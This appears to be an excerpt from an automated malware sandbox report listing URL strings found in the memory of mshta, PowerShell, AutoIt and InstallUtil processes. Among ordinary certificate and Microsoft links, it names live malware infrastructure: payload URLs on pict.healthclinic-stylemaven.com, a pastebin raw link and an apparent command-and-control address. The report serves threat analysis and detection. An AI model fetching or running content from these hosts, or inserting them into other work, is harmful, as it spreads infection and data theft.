Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002D64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000006.00000003.2122310774.0000019B58BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.2278172085.00000186C87C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA52E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pict.healthclinic-stylemaven.com
Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680083000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2286266487.00000186D0AC0000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2231897004.0000000000529000.00000002.00000001.01000000.0000000F.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2355136539.0000000000A49000.00000002.00000001.01000000.00000010.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000000.2422491840.0000000000A49000.00000002.00000001.01000000.00000010.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F68005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000004191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4537536792.0000000004175000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000003017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000006.00000003.2122310774.0000019B58C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2122310774.0000019B58BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.2278172085.00000186C87C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: InstallUtil.exe, 0000000F.00000002.2359029068.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/nGmga9WQ
Source: InstallUtil.exe, 0000000F.00000002.2359029068.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/nGmga9WQPO
Source: powershell.exe, 00000004.00000002.2094500241.000001F6804AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.hea
Source: powershell.exe, 00000004.00000002.2094500241.000001F6804AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.heaX
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-st
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemav
Source: powershell.exe, 00000003.00000002.2101472829.0000027A681F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven
Source: powershell.exe, 00000007.00000002.2228028553.00000186BA16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com
Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/
Source: mshta.exe, 00000005.00000003.2293225799.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B62E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B62F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/G
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/09125451
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164
Source: mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4
Source: powershell.exe	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4$global:?
Source: mshta.exe, 00000005.00000003.2306370988.000001965B5B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306996383.000001965B5B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4%8
Source: mshta.exe, 00000005.00000003.2293225799.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293478722.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307087883.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299199723.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294593006.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2308386652.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2300152944.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4...
Source: mshta.exe, 00000005.00000002.2308975410.0000019E62238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4/
Source: mshta.exe, 00000005.00000002.2307063407.000001965B609000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B607000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp42
Source: mshta.exe, 00000005.00000003.2304861554.0000019E62830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4485
Source: mshta.exe, 00000005.00000003.2304861554.0000019E62830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp46
Source: mshta.exe, 00000005.00000002.2309416176.0000019E62B40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp46q
Source: mshta.exe, 00000005.00000003.2294395378.000001965B667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299822414.000001965B667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306851846.000001965B570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307190695.000001965B668000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293344862.000001965B665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4C:
Source: mshta.exe, 00000005.00000002.2306830557.000001965B560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4H
Source: powershell.exe, 00000004.00000002.2097708707.000001F6F90A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4Open
Source: mshta.exe, 00000005.00000002.2307288509.000001965B890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4System32
Source: mshta.exe, 00000005.00000002.2307087883.000001965B622000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B622000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4e
Source: mshta.exe, 00000005.00000003.2304540391.0000019E623E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2304540391.0000019E623ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4https://pict.healthclinic-stylem
Source: powershell.exe, 00000004.00000002.2094500241.000001F680001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4p
Source: mshta.exe, 00000005.00000003.2300521591.0000019E5E257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293478722.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299941471.0000019E5E256000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2299199723.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2308415549.0000019E5E257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294593006.0000019E5E250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4pia
Source: mshta.exe, 00000005.00000002.2306851846.000001965B58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4t
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/n
Source: powershell.exe, 00000007.00000002.2228028553.00000186B9829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pict.healthclinic-stylemaven.com/api/uz/0912545164/nnn.bin
